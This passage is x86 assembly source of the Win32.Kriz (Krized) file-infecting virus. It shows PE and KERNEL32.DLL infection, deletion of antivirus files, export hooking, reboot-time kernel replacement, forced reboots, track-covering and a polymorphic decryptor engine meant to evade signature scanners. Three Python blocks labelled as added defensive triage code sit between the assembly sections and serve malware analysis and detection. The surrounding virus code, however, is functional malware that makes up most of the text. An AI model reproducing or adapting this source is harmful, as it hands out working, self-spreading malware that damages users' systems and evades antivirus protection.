@1: CMP AL, 0 ; Were all APIs found?
Fetched_API = BYTE PTR $-1
JNZ Wipe_Memory ; Else abort further infect.
PUSH 0FFFFFFFFh ; Request for kernel-infect.
POP ESI
CALL Infect_File
; Try to cover-up as many tracks as possible by clearing
; most of our code in memory, as we don't need it anymore.
Wipe_Memory: MOV EDI, EBP
MOV CX, (Wipe_Memory-START)
CLD
REP STOSB
ADD EDI, (Infect_File-Wipe_Memory)
MOV CX, (Virus_End-Infect_File)
REP STOSB
MOV ECX, 0 ; Should we perform a reboot?
ExitWindowsEx = DWORD PTR $-4
JECXZ Rest_Init_SEH
PUSH EWX_FORCE OR EWX_REBOOT ; Force a system reboot.
PUSH 0
CALL ECX
Rest_Init_SEH: XOR EAX, EAX
POP DWORD PTR FS:[EAX] ; Unhook our own SEH.
POP EAX
Return_To_Host: POPAD ; Restore all registers.
POPFD
RET ; Return to our host.
;-------------------------------------------------
; ESI == 0FFFFFFFFh = Infect kernel.
; ESI != 0FFFFFFFFh = Infect file pointed by ESI.
;-------------------------------------------------
Infect_File:
PUSHAD
XOR EBX, EBX
CALL Setup_Inf_SEH
PUSHAD
MOV ESI, [ESP+(9*4)] ; Grab exception-code off
LODSD ; the stack.
CALL Get_Delta
SHL EAX, 4 ; Strip flags.
CMP EAX, (03h SHL 4) ; Virus' request to call an
JE Virus_Request ; API ?
MOV ESP, [ESP+(10*4)] ; Unhandled exception, so
; abort further execution.
JMP_R_Inf_SEH: JMP Rest_Inf_SEH
Virus_Request: MOV EDX, [ESP+(11*4)] ; Context-block.
LEA EAX, [EBP+(Perform_API-START)]
XCHG [EDX+184], EAX ; Swap EIP.
MOV ECX, [EDX+196] ; ESP.
; Win9x sets the exception-address with Exception_EIP + 1, whereas NT
; does the right thing and uses Exception_EIP, we need some extra
; code to take this into account.
CMP BYTE PTR [EAX], 0CCh ; This is the breakpoint?
JNE Swap_Address
INC EAX ; Skip breakpoint.
Swap_Address: XCHG [ECX], EAX ; Swap index-number with
; Perform_API's address.
MOV [EBP+(Work_API_Index-START)], AL
POPAD
XOR EAX, EAX ; Reload context and continue
; execution.
RET
Setup_Inf_SEH: PUSH DWORD PTR FS:[EBX]
MOV FS:[EBX], ESP
; The virtual-size entry of object-headers is not reliable,
; therefore we need to allocate our memory by hand.
PUSH (End_Heap-Virus_End) ; Allocate memory on the
PUSH EBX ; global heap.
PUSH ixGlobalAlloc
INT 03h
XCHG ECX, EAX ; Error?
JECXZ JMP_R_Inf_SEH
MOV [EBP+(Global_Handle-START)], ECX
MOV [EBP+(Infect_Mode-START)], BL
INC ESI ; Request to infect K32 ?
JZ Payload_Test
DEC ESI ; Some API can have NULL.
JZ JMP_Free_Glo_M
MOV BYTE PTR [EBP+(Infect_Mode-START)], (Open_Candidate-Infect_Mode) - 1
XCHG EBX, EAX ; Zero EAX.
LEA EBX, [ECX+(ANSI_Target_File-Virus_End)]
MOV EDI, EBX
MOV ECX, 260
CLD
Convert_Path: LODSB ; Fetch next byte/word.
NOP
Unicode_Switch = WORD PTR $-2
OR AH, AH ; Is it non-ASCII ?
JNZ JMP_Free_Glo_M ; Then abort infect.
CMP AL, 'a'
JB Store_Upcase
CMP AL, 'z'
JA Store_Upcase
SUB AL, 'a' - 'A' ; Convert to uppercase.
Store_Upcase: STOSB
OR AL, AL
JZ Init_Find_Name
LOOP Convert_Path
JMP_Free_Glo_M: JMP Free_Global_M
Init_Find_Name: MOV ESI, EDI
Find_File_Name: DEC ESI
CMP ESI, EBX ; Reached the beginning?
JE Check_File_Ext
CMP BYTE PTR [ESI-1], '\' ; Found start filename?
JNE Find_File_Name
Check_File_Ext: CMP [EDI-5], 'EXE.' ; Standard .EXE-file?
JE Calc_CRC_Name
CMP [EDI-5], 'RCS.' ; Perhaps a screen-saver?
JNE JMP_Free_Glo_M
Calc_CRC_Name: CALL Calculate_CRC16 ; Calculate filename's CRC.
; Kill AV-files.
LEA EDI, [EBP+(Kill_Table-START)]
PUSH Kill_CRC_Count
POP ECX
REPNE SCASW
JNE Payload_Test
PUSH FILE_ATTRIBUTE_NORMAL ; Prevent any Happy99 alike
PUSH EBX ; 'protection'.
PUSH ixSetFileAttributesA
INT 03h
PUSH EBX ; Later dude..
PUSH ixDeleteFileA
INT 03h
Payload_Test: CALL Check_For_Payload ; Activate?
MOV BYTE PTR [EBP+(Clear_Tracks_Sw-START)], (Free_Global_M-Clear_Tracks_Sw) - 1
JMP $
Infect_Mode = BYTE PTR $-1
MOV EBX, [EBP+(Global_Handle-START)]
; Obtain the path to the Windoze system-directory,
; which is most likely C:\WINDOWS\SYSTEM.
PUSH 260
LEA ESI, [EBX+(Clean_K32_Path-Virus_End)]
PUSH ESI
PUSH ixGetSystemDirectoryA
INT 03h
LEA EDI, [EBX+(Infected_K32_Path-Virus_End)]
MOV [EBP+(Offset_Inf_K32-START)], EDI
PUSH EDI
XCHG ECX, EAX
CLD
REP MOVSB
PUSH ESI
; Append the temporary virus filename to the
; system-path, ie. C:\WINDOWS\SYSTEM\KRIZED.TT6.
LEA ESI, [EBP+(Infected_K32-START)]
MOVSD
MOVSD
MOVSD
; Append the original kernel filename to the
; system-path, ie. C:\WINDOWS\SYSTEM\KERNEL32.DLL.
POP EDI
LEA ESI, [EBP+(KERNEL32_Name-START)]
MOV CL, 14
REP MOVSB
; In the system-dir, copy KERNEL32.DLL to KRIZED.TT6.
PUSH 1
LEA EAX, [EBX+(Infected_K32_Path-Virus_End)]
PUSH EAX
LEA EAX, [EBX+(Clean_K32_Path-Virus_End)]
PUSH EAX
PUSH ixCopyFileA
INT 03h
POP EBX
DEC EAX ; Any problems doing it?
JNZ Free_Global_M
MOV [EBP+(Clear_Tracks_Sw-START)], AL
Open_Candidate: XOR ESI, ESI
JNZ $-27
PUSH EBX ; Umm.. get its attribs?
PUSH ixGetFileAttributesA
INT 03h
INC EAX ; Ack, error.
JZ Clear_Tracks
DEC EAX ; Restore return value.
PUSH EAX
PUSH EBX
AND AL, NOT 00000001b ; Readonly my ass..
PUSH EAX ; Strip readonly-flag.
PUSH EBX
PUSH ixSetFileAttributesA
INT 03h
OR EAX, EAX ; Test for error.
JZ Restore_Attr
PUSH ESI ; Open the candidate-file.
PUSH FILE_ATTRIBUTE_NORMAL
PUSH OPEN_EXISTING
PUSH ESI
PUSH ESI
PUSH GENERIC_READ OR GENERIC_WRITE
PUSH EBX
PUSH ixCreateFileA
INT 03h
MOV [EBP+(File_Handle-START)], EAX
INC EAX ; Error?
JZ Restore_Attr
MOV EAX, [EBP+(Global_Handle-START)]
ADD EAX, (Time_Last_Write-Virus_End)
PUSH EAX
PUSH EAX ; Fetch its time-stamps.
SUB EAX, 8
PUSH EAX
SUB EAX, 8
PUSH EAX
PUSH DWORD PTR [EBP+(File_Handle-START)]
PUSH ixGetFileTime
INT 03h
PUSH ESI ; Map whole file.
PUSH ESI
PUSH ESI
PUSH PAGE_READONLY
PUSH ESI ; Standard security.
PUSH DWORD PTR [EBP+(File_Handle-START)]
PUSH ixCreateFileMappingA
INT 03h
OR EAX, EAX ; Error?
JZ Restore_Stamp
MOV [EBP+(Map_Handle-START)], EAX
PUSH ESI
PUSH ESI
PUSH ESI
PUSH FILE_MAP_READ
PUSH DWORD PTR [EBP+(Map_Handle-START)]
PUSH ixMapViewOfFile
INT 03h
OR EAX, EAX ; Error?
JZ Close_Mapping
MOV [EBP+(Map_Address-START)], EAX
XCHG EBX, EAX
PUSH ESI
PUSH DWORD PTR [EBP+(File_Handle-START)]
PUSH ixGetFileSize
INT 03h
CMP EAX, 4096 ; Avoid too small files.
JB Abort_Checks
CMP [EBX.MZ_Mark], 'ZM' ; It must be an .EXE-file.
JNE Abort_Checks
CMP [EBX.MZ_Reloc_Table], 40h ; External header present?
JB Abort_Checks
ADD EBX, [EBX+3Ch] ; Obtain pointer PE-header.
CMP [EBX.PE_Mark], 'EP' ; PE-header is really there?
JNE Abort_Checks
; Only infect 80386/80486/80586-files.
CMP [EBX.CPU_Type], 14Ch ; 80386 compatibility?
JB Abort_Checks
CMP [EBX.CPU_Type], 14Eh ; 80586 compatibility?
JA Abort_Checks
CMP BYTE PTR [EBP+(Infect_Mode-START)], 0
JZ Check_Our_Mark
; Infect_Mode 0 means the KERNEL32 copy; otherwise refuse DLLs (IMAGE_FILE_DLL set).
TEST BYTE PTR [EBX.PE_Flags+1], 00100000b
JNZ Abort_Checks
Check_Our_Mark: XCHG EDI, EAX
MOVZX EAX, [EBX.Object_Count]
DEC EAX
PUSH 40
POP ECX
MUL ECX
MOVZX EDX, [EBX.NT_Header_Size]
LEA EDX, [EBX+24+EDX]
ADD EDX, EAX
MOV AL, BYTE PTR [EDX.Section_Flags+3]
AND AL, 11010000b ; Keep only the Write/Read/Shared bits.
CMP AL, 11010000b ; All three set is our mark: already infected.
JE Abort_Checks
; Calculate physical size after infection.
MOV EAX, [EDX.Section_Physical_Offset]
ADD EAX, [EDX.Section_Physical_Size]
ADD EAX, Virus_Size + Poly_Size
MOV ECX, [EBX.File_Align]
CALL Align_EAX
CMP EAX, EDI ; Host increases in size?
JAE Set_Inf_Size
XCHG EDI, EAX ; Don't resize if not.
Set_Inf_Size: MOV [EBP+(Infected_Size-START)], EAX
INC ESI ; Mark as a valid candidate (ESI = 1).
JNS Abort_Checks ; Always taken; the byte below never runs.
DB 0EAh ; Stray JMP FAR opcode to throw off linear disassembly.
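; Added example (not part of the virus source): a Python triage script that
; re-implements the candidate tests above and the virus' own "already
; infected" mark (Write/Read/Shared all set on the last object-header), plus
; a bounded version of the Find_RVA walk used later, so a responder can sweep
; PE files for the marker offline. The image it builds is constructed for the
; assertions only; nothing below is the virus' code.

```python
"""Static triage for the Win32.Kriz infection marker.

Added example, not code from the virus listing.  Re-implements the candidate
tests the infector applies to the mapped file (size, MZ, e_lfarlc, PE
signature, Machine, DLL flag), its "already infected" test (Write, Read and
Shared all set on the last section header) and the Find_RVA walk, with the
bounds checks the original omits.  Offsets follow the PE_Header and
Section_Header STRUCs at the end of the listing.  build_test_pe() is a
constructed image for testing, not a real binary.
"""
import struct
import sys

IMAGE_FILE_DLL = 0x2000
IMAGE_SCN_MEM_SHARED = 0x10000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
KRIZ_MARK = IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_SHARED  # 0D0h in byte 3


def section_headers(data, pe):
    """Yield (vsize, rva, rawsize, rawoff, flags) for each 40-byte object-header."""
    nsec = struct.unpack_from("<H", data, pe + 6)[0]           # Object_Count
    opt_size = struct.unpack_from("<H", data, pe + 20)[0]      # NT_Header_Size
    base = pe + 24 + opt_size                                  # LEA EDX, [EBX+24+EDX]
    for i in range(nsec):
        off = base + 40 * i
        if off + 40 > len(data):                               # truncated table
            break
        vs, rva, rs, ro = struct.unpack_from("<IIII", data, off + 8)
        flags = struct.unpack_from("<I", data, off + 36)[0]    # Section_Flags
        yield vs, rva, rs, ro, flags


def rva_to_offset(data, pe, rva):
    """Find_RVA with a bound: file offset of an RVA, or None if in no section."""
    for vs, srva, rs, ro, _ in section_headers(data, pe):
        if srva <= rva < srva + max(vs, rs):
            return ro + (rva - srva)
    return None


def kriz_triage(data):
    """Run the infector's candidate tests and its marker test; return the findings."""
    r = {"candidate": False, "marked": False, "eip_in_last": False, "reason": ""}
    if len(data) < 4096:                                       # CMP EAX, 4096
        r["reason"] = "too small"
        return r
    if data[:2] != b"MZ":                                      # MZ_Mark
        r["reason"] = "no MZ header"
        return r
    if struct.unpack_from("<H", data, 0x18)[0] < 0x40:         # MZ_Reloc_Table
        r["reason"] = "no extended header"
        return r
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    if pe + 0x60 > len(data) or data[pe:pe + 4] != b"PE\0\0":  # PE_Mark
        r["reason"] = "no PE header"
        return r
    machine = struct.unpack_from("<H", data, pe + 4)[0]        # CPU_Type
    if not 0x14C <= machine <= 0x14E:
        r["reason"] = "not an i386 image"
        return r
    r["is_dll"] = bool(struct.unpack_from("<H", data, pe + 22)[0] & IMAGE_FILE_DLL)
    secs = list(section_headers(data, pe))
    if not secs:
        r["reason"] = "no sections"
        return r
    vs, rva, rs, _, flags = secs[-1]                           # last object-header
    r["candidate"] = True
    r["marked"] = (flags & KRIZ_MARK) == KRIZ_MARK             # AND / CMP 11010000b
    eip = struct.unpack_from("<I", data, pe + 40)[0]           # EIP_RVA
    r["eip_in_last"] = rva <= eip < rva + max(vs, rs)
    r["eip_offset"] = rva_to_offset(data, pe, eip)
    return r


def build_test_pe(last_flags, entry_in_last, dll=False):
    """Constructed two-section PE32 image (zero-filled sections) for testing."""
    pe, opt_size = 0x80, 0xE0
    hdr = bytearray(0x200)
    hdr[:2] = b"MZ"
    struct.pack_into("<H", hdr, 0x18, 0x40)                    # e_lfarlc
    struct.pack_into("<I", hdr, 0x3C, pe)                      # e_lfanew
    hdr[pe:pe + 4] = b"PE\0\0"
    chars = 0x0102 | (IMAGE_FILE_DLL if dll else 0)
    struct.pack_into("<HHIIIHH", hdr, pe + 4, 0x14C, 2, 0, 0, 0, opt_size, chars)
    opt = pe + 24
    struct.pack_into("<H", hdr, opt, 0x10B)                    # PE32 magic
    struct.pack_into("<I", hdr, opt + 16, 0x2000 if entry_in_last else 0x1000)
    struct.pack_into("<III", hdr, opt + 28, 0x400000, 0x1000, 0x200)
    struct.pack_into("<II", hdr, opt + 56, 0x3000, 0x200)      # SizeOfImage/Headers
    secs = [(b".text", 0x1000, 0x1000, 0x800, 0x200, 0x60000020),
            (b".data", 0x1000, 0x2000, 0x800, 0xA00, last_flags)]
    for i, (name, vs, rva, rs, ro, fl) in enumerate(secs):
        off = opt + opt_size + 40 * i
        hdr[off:off + 8] = name.ljust(8, b"\0")
        struct.pack_into("<IIIIIIHHI", hdr, off + 8, vs, rva, rs, ro, 0, 0, 0, 0, fl)
    return bytes(hdr) + bytes(0x1000)                          # 0x1200 bytes total


if __name__ == "__main__":
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            print(path, kriz_triage(fh.read()))
```

; The marker alone is what the virus itself trusts; "eip_in_last" is the extra
; heuristic a responder wants, since appended code has to receive control.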
Abort_Checks: PUSH DWORD PTR [EBP+(Map_Address-START)]
PUSH ixUnmapViewOfFile
INT 03h
PUSH DWORD PTR [EBP+(Map_Handle-START)]
PUSH ixCloseHandle
INT 03h
DEC ESI ; Valid host?
JNZ Restore_Stamp
PUSH ESI
PUSH DWORD PTR [EBP+(Infected_Size-START)]
PUSH ESI
PUSH PAGE_READWRITE
PUSH ESI ; Standard security.
PUSH DWORD PTR [EBP+(File_Handle-START)]
PUSH ixCreateFileMappingA
INT 03h
OR EAX, EAX
JZ Restore_Stamp
MOV [EBP+(Map_Handle-START)], EAX
PUSH ESI
PUSH ESI
PUSH ESI
PUSH FILE_MAP_WRITE
PUSH DWORD PTR [EBP+(Map_Handle-START)]
PUSH ixMapViewOfFile
INT 03h
MOV [EBP+(Map_Address-START)], EAX
OR EAX, EAX ; Error?
JZ Close_Mapping
XCHG EDI, EAX ; Base of mapped candidate.
MOV EBX, [EDI+3Ch] ; PE-header of our candidate.
ADD EBX, EDI
MOVZX EAX, [EBX.Object_Count] ; Calculate offset of last
DEC EAX ; object-header.
PUSH 40
POP ECX
MUL ECX
; Size of formatted header.
MOVZX EDX, [EBX.NT_Header_Size]
LEA EDI, [EBX+24+EDX]
PUSH EDI ; Start object-headers.
ADD EDI, EAX ; Last object-header.
MOV EAX, [EDI.Section_Physical_Size]
PUSH EAX
ADD EAX, Virus_Size + Poly_Size
MOV ECX, [EBX.File_Align]
CALL Align_EAX
MOV ESI, EAX
XCHG [EDI.Section_Physical_Size], EAX
ADD EAX, [EDI.Section_RVA]
PUSH EAX
MOV EAX, [EDI.Section_Virtual_Size]
ADD EAX, (Virus_Size + Poly_Size) - 1
MOV ECX, [EBX.Object_Align]
Calc_Virt_Size: INC EAX
CALL Align_EAX
CMP EAX, ESI
JB Calc_Virt_Size
MOV [EDI.Section_Virtual_Size], EAX
ADD EAX, [EDI.Section_RVA]
MOV [EBX.Image_Size], EAX
POP EAX
POP ECX
ADD ECX, [EDI.Section_Physical_Offset]
ADD ECX, [EBP+(Map_Address-START)]
MOV EDX, EAX
XCHG [EBX.EIP_RVA], EAX
CALL Poly_Engine ; Lame poly-layer.
POP EDX
; Krized used to add a new section to the host, but unfortunately most
; NT files (including K32) have no room for an extra object-header; this
; more or less forced the append-to-the-last-section method, which could
; technically cause instabilities.
; Readable/writeable/shareable.
OR BYTE PTR [EDI.Section_Flags+3], 11010000b
XOR ECX, ECX
; We're infecting KERNEL32.DLL ?
CMP [EBP+(Infect_Mode-START)], CL
JNZ Init_Succesful
; Bump K32's build time-stamp: bound imports in executables then fail the
; stamp check and the loader re-resolves them through K32's export-table,
; which we redirect below to our hooks, instead of using the hard-coded
; bound addresses.
INC [EBX.PE_Date_Time]
; Notify DLL of PROCESS_ATTACH. This is always done regardless of this
; flag, but I'd rather waste some bytes playing safe.
OR BYTE PTR [EBX.DLL_Flags], 00000001b
; Now change the exports of K32 to point
; to the virus' own handlers.
LEA ESI, [EBP+(Hook_Exports-START)]
CLD
Hook_Export: LODSD ; Get array entry in export.
XCHG EDI, EAX
; Convert the RVA to a physical address.
Find_RVA: MOV EAX, [EDX.Section_RVA]
ADD EAX, [EDX.Section_Virtual_Size]
CMP EDI, EAX ; RVA is in section's space?
JB Calculate_Phys
ADD EDX, 40 ; Next section.
JMP Find_RVA
Calculate_Phys: SUB EDI, [EDX.Section_RVA]
ADD EDI, [EDX.Section_Physical_Offset]
MOVZX EAX, WORD PTR [EBP+(Dispatch_API-START)+(ECX*2)]
ADD EAX, 12345678h
New_Virus_RVA = DWORD PTR $-4
ADD EDI, [EBP+(Map_Address-START)]
STOSD
Cont_Hook_Loop: INC ECX
CMP CL, Hook_API_Count ; Did 'em all?
JB Hook_Export
MOV ESI, [EBP+(Global_Handle-START)]
; Attempt to register a file-update to replace the
; original KERNEL32.DLL with the infected one at
; the next boot-up.
PUSH MOVEFILE_DELAY_UNTIL_REBOOT OR MOVEFILE_REPLACE_EXISTING
LEA EAX, [ESI+(Clean_K32_Path-Virus_End)]
PUSH EAX
LEA EAX, [ESI+(Infected_K32_Path-Virus_End)]
PUSH EAX
PUSH ixMoveFileExA
INT 03h
OR EAX, EAX ; Successful?
JNZ Init_Succesful
PUSH ixGetLastError ; Get extended error-
INT 03h ; information.
; ERROR_ACCESS_DENIED (NT, no admin rights): give up quietly.
CMP EAX, ERROR_ACCESS_DENIED
JE Unmap_View
; Anything else means Win9x, where MoveFileEx can't delay until reboot,
; so queue the swap in WININIT.INI's [rename] section instead...
CALL @2
DB 'WININIT.INI', 0
@2: LEA EAX, [ESI+(Infected_K32_Path-Virus_End)]
PUSH EAX
LEA EAX, [ESI+(Clean_K32_Path-Virus_End)]
PUSH EAX
CALL @3
DB 'rename', 0
@3: PUSH ixWritePrivateProfileStringA
INT 03h
XCHG ECX, EAX ; Failed: the user doesn't seem
JECXZ Unmap_View ; to have admin privileges.
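; Added example (not part of the virus source): the check a responder wants
; for the two persistence paths above. On NT, MoveFileEx with
; MOVEFILE_DELAY_UNTIL_REBOOT is recorded in the REG_MULTI_SZ value
; PendingFileRenameOperations under HKLM\SYSTEM\CurrentControlSet\Control\
; Session Manager; on Win9x the rename lands in WININIT.INI's [rename]
; section as "destination=source". The Python below parses both formats and
; flags renames whose destination is KERNEL32.DLL. The sample registry value
; and INI text are constructed for the assertions.

```python
r"""Find reboot-time file replacements aimed at KERNEL32.DLL.

Added example, not code from the virus listing.  The infector queues the
swap of KERNEL32.DLL for KRIZED.TT6 either through MoveFileExA with
MOVEFILE_DELAY_UNTIL_REBOOT, which on NT is recorded in the REG_MULTI_SZ
value PendingFileRenameOperations under HKLM\SYSTEM\CurrentControlSet\
Control\Session Manager, or, on Win9x, as a "destination=source" line in
the [rename] section of WININIT.INI.  Both parsers below take the raw data
and report pending renames whose destination is on the watch list.  The
registry value and INI text used for the assertions are constructed.
"""
import re

WATCH = ("KERNEL32.DLL",)


def _strip_nt(path):
    """Drop the \\??\\ prefix the registry entries carry."""
    return path[4:] if path.startswith("\\??\\") else path


def parse_pending_renames(multi_sz):
    """Decode PendingFileRenameOperations into (source, destination, replace) triples.

    The strings come in pairs: an NT-style source path, then the destination,
    '!'-prefixed when MOVEFILE_REPLACE_EXISTING was used and empty for a delete.
    A trailing empty destination merges with the value's double-NUL terminator,
    so an odd string count is padded back to a pair.
    """
    if not multi_sz.strip("\0"):
        return []
    parts = multi_sz.rstrip("\0").split("\0")
    if len(parts) % 2:
        parts.append("")
    triples = []
    for src, dst in zip(parts[0::2], parts[1::2]):
        replace = dst.startswith("!")
        triples.append((_strip_nt(src), _strip_nt(dst[1:] if replace else dst), replace))
    return triples


def parse_wininit_renames(ini_text):
    """(source, destination, True) triples from WININIT.INI's [rename] section."""
    triples, in_rename = [], False
    for line in ini_text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_rename = line[1:-1].lower() == "rename"
            continue
        if in_rename and "=" in line:
            dst, src = line.split("=", 1)             # WININIT.INI stores dest=src
            triples.append((src.strip(), dst.strip(), True))
    return triples


def suspicious_renames(triples, watch=WATCH):
    """(source, destination) for every rename whose destination file is watched."""
    hits = []
    for src, dst, _replace in triples:
        if re.split(r"[\\/]", dst)[-1].upper() in watch:
            hits.append((src, dst))
    return hits


# Constructed samples: a queued replace of KERNEL32.DLL next to an unrelated
# installer rename, and the Win9x equivalent plus a delete and another section.
SAMPLE_PENDING = "\0".join([
    r"\??\C:\WINNT\system32\KRIZED.TT6", r"!\??\C:\WINNT\system32\KERNEL32.DLL",
    r"\??\C:\TEMP\setup.tmp", r"\??\C:\TEMP\setup.exe",
]) + "\0\0"
SAMPLE_WININIT = "\r\n".join([
    "[rename]",
    r"C:\WINDOWS\SYSTEM\KERNEL32.DLL=C:\WINDOWS\SYSTEM\KRIZED.TT6",
    r"NUL=C:\WINDOWS\TEMP\junk.tmp",
    "[other]", "foo=bar",
])

if __name__ == "__main__":
    print(suspicious_renames(parse_pending_renames(SAMPLE_PENDING)))
    print(suspicious_renames(parse_wininit_renames(SAMPLE_WININIT)))
```

; Feed parse_pending_renames() the decoded REG_MULTI_SZ (e.g. from winreg or an
; offline hive parser) and parse_wininit_renames() the text of WININIT.INI.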
Init_Succesful: XOR EDX, EDX
MOV BYTE PTR [EBP+(Clear_Tracks_Sw-START)], (Free_Global_M-Clear_Tracks_Sw) - 1
CMP [EBP+(Infect_Mode-START)], DL
JNZ Test_Checksum
MOV BYTE PTR [EBP+(Clear_Tracks_Sw-START)], (Reboot_Test-Clear_Tracks_Sw) - 1
Test_Checksum: CMP [EBX.PE_Checksum], EDX ; This file is checksummed?
JZ Unmap_View
; This is the same algorithm imagehlp's CheckSumMappedFile uses: a 16-bit
; word sum with the carries folded back in (checksum field counted as
; zero), plus the file length. The loop assumes Infected_Size is even,
; which a power-of-two File_Align guarantees.
MOV [EBX.PE_Checksum], EDX
MOV ESI, [EBP+(Map_Address-START)]
MOV ECX, 12345678h
Infected_Size = DWORD PTR $-4
SHR ECX, 1 ; Words.
Checksum_Loop: MOVZX EAX, WORD PTR [ESI]
ADD EDX, EAX
MOV EAX, EDX
AND EDX, 0FFFFh ; Convert to 16-bit word.
SHR EAX, 16
ADD EDX, EAX
INC ESI
INC ESI
LOOP Checksum_Loop
MOV EAX, EDX
SHR EAX, 16
ADD AX, DX
ADD EAX, [EBP+(Infected_Size-START)]
MOV [EBX.PE_Checksum], EAX
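; Added example (not part of the virus source): the checksum above in
; Python, once as a literal mirror of Checksum_Loop and once as the
; documented PE algorithm, to show they agree and to give a responder a
; stored-vs-computed check. The point for analysis is that a verifying
; header checksum proves nothing here: the virus rewrites it whenever the
; host had one. The test image is constructed.

```python
"""PE header checksum, as Test_Checksum recomputes it.

Added example, not code from the virus listing.  kriz_checksum_loop()
mirrors Checksum_Loop instruction for instruction; pe_checksum() is the
documented algorithm behind imagehlp's CheckSumMappedFile (CheckSum field
treated as zero, odd trailing byte folded in).  They agree on every
even-sized image, which is the practical lesson: a header checksum that
verifies is not evidence of integrity, the infector simply writes a fresh
one whenever the host had a non-zero checksum.  make_test_image() is a
constructed image for the assertions only.
"""
import struct


def kriz_checksum_loop(data):
    """Checksum_Loop over an image whose PE_Checksum field is already zero."""
    acc = 0                                          # EDX
    for i in range(0, len(data) // 2 * 2, 2):        # ECX = Infected_Size / 2 words
        acc += struct.unpack_from("<H", data, i)[0]  # ADD EDX, word
        acc = (acc & 0xFFFF) + (acc >> 16)           # fold the carry back in
    acc = ((acc >> 16) + (acc & 0xFFFF)) & 0xFFFF    # SHR EAX,16 / ADD AX,DX
    return (acc + len(data)) & 0xFFFFFFFF            # ADD EAX, Infected_Size


def pe_checksum(data, checksum_field=None):
    """Documented PE checksum of a whole file image."""
    if checksum_field is not None:                   # the stored value counts as zero
        data = data[:checksum_field] + b"\0\0\0\0" + data[checksum_field + 4:]
    acc = 0
    for i in range(0, len(data) - 1, 2):
        acc += struct.unpack_from("<H", data, i)[0]
        acc = (acc & 0xFFFF) + (acc >> 16)
    if len(data) & 1:                                # odd trailing byte
        acc += data[-1]
        acc = (acc & 0xFFFF) + (acc >> 16)
    acc = ((acc >> 16) + (acc & 0xFFFF)) & 0xFFFF
    return (acc + len(data)) & 0xFFFFFFFF


def checksum_field_offset(data):
    """File offset of PE_Checksum (PE header + 88); raises if not a PE image."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    if pe + 92 > len(data) or data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    return pe + 88


def header_checksum(data):
    """Return (stored, computed); the infector leaves these equal on its hosts."""
    field = checksum_field_offset(data)
    return struct.unpack_from("<I", data, field)[0], pe_checksum(data, field)


def stamp_checksum(data):
    """Write a fresh checksum the way Test_Checksum does."""
    field = checksum_field_offset(data)
    out = bytearray(data)
    struct.pack_into("<I", out, field, pe_checksum(data, field))
    return bytes(out)


def make_test_image():
    """Constructed 4 KiB MZ/PE shell with a zero CheckSum and non-zero payload bytes."""
    img = bytearray(4096)
    img[:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x80)
    img[0x80:0x84] = b"PE\0\0"
    img[0x200:] = bytes(range(256)) * 14             # 0xE00 bytes of data
    return bytes(img)
```

; header_checksum() on a file from a suspect box tells you whether the field
; verifies; comparing against a known-good copy of the same build is what
; actually detects the replacement.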
Unmap_View: PUSH 12345678h
Map_Address = DWORD PTR $-4
PUSH ixUnmapViewOfFile
INT 03h
Close_Mapping: PUSH 12345678h
Map_Handle = DWORD PTR $-4
PUSH ixCloseHandle
INT 03h
Restore_Stamp: POP EAX ; Restore file's original
; time-stamps.
PUSH EAX
SUB EAX, 8
PUSH EAX
SUB EAX, 8
PUSH EAX
PUSH DWORD PTR [EBP+(File_Handle-START)]
PUSH ixSetFileTime
INT 03h
Close_File: PUSH 12345678h ; And finally close the file.
File_Handle = DWORD PTR $-4
PUSH ixCloseHandle
INT 03h
; Restore the file's original attributes.
Restore_Attr: CMP BYTE PTR [EBP+(Clear_Tracks_Sw-START)], 0
JNZ Set_Attributes
; Trash-copy must be deletable.
AND BYTE PTR [ESP+(1*4)], NOT 00000001b
Set_Attributes: PUSH ixSetFileAttributesA
INT 03h
; If something went wrong while infecting the KERNEL32.DLL copy,
; clean up our trash by deleting it.
Clear_Tracks: JMP $
Clear_Tracks_Sw = BYTE PTR $-1
PUSH 12345678h ; Delete KRIZED.TT6 in the
Offset_Inf_K32 = DWORD PTR $-4 ; system-directory.
PUSH ixDeleteFileA
INT 03h
JMP Free_Global_M
; Arrange for the virus to reboot the system if it has already been up
; for a long time. Server-systems often run for months on end, and the
; virus can't become resident until the next system-boot, hence this
; routine.
Reboot_Test: PUSH ixGetTickCount ; Retrieve tickcount since
INT 03h ; Windows was started.
OR EAX, EAX ; Bit 31 clear, i.e. up less than
JNS Free_Global_M ; 2^31 ms (about 24.9 days)?
CALL @4 ; Load USER32.DLL as we need
DB 'USER32', 0 ; one of its functions.
@4: PUSH ixLoadLibraryA
INT 03h
CALL @5 ; Retrieve API-address.
DB 'ExitWindowsEx', 0
@5: PUSH EAX
PUSH ixGetProcAddress
INT 03h
; Store the address for later use.
MOV [EBP+(ExitWindowsEx-START)], EAX
Free_Global_M: PUSH 12345678h ; Free our global allocated
Global_Handle = DWORD PTR $-4 ; memory.
PUSH ixGlobalFree
INT 03h
Rest_Inf_SEH: XOR EAX, EAX ; Unhook our SEH.
POP DWORD PTR FS:[EAX]
POP EBX
POPAD ; Restore registers.
RET ; And we're done.
; A humble poly-engine: it builds decryptors with random registers,
; peppered with some simple junk. It won't keep out the average AV, but
; it's effective enough against public-domain scanners that rely on
; pure signature-matching.
; So get me an official opcode list and I'll throw out the lame table-
; driven polymorphics :P
Poly_Engine:
PUSHAD
PUSH EAX
Gen_Decryptor: MOV EDI, [ESP+(7*4)] ; ECX on entry.
PUSH 13 ; Pick a DWORD stacker.
POP EAX
CALL Get_Random
MOV AL, [EBP+(PUSH_Reg32-START)+EAX]
STOSB
MOV AL, 9Ch ; PUSHFD
STOSB
MOV AL, 60h ; PUSHAD
STOSB
CALL Add_Garbage
MOV AL, 0E8h ; CALL
STOSB
MOV AL, 10
CALL Get_Random
INC EAX
STOSD
MOV ESI, EDI
XCHG ECX, EAX
Add_Random: MOV EAX, ESP
CALL Get_Random
STOSB
LOOP Add_Random
PUSH 7
POP EAX
CALL Get_Random
XCHG EBX, EAX
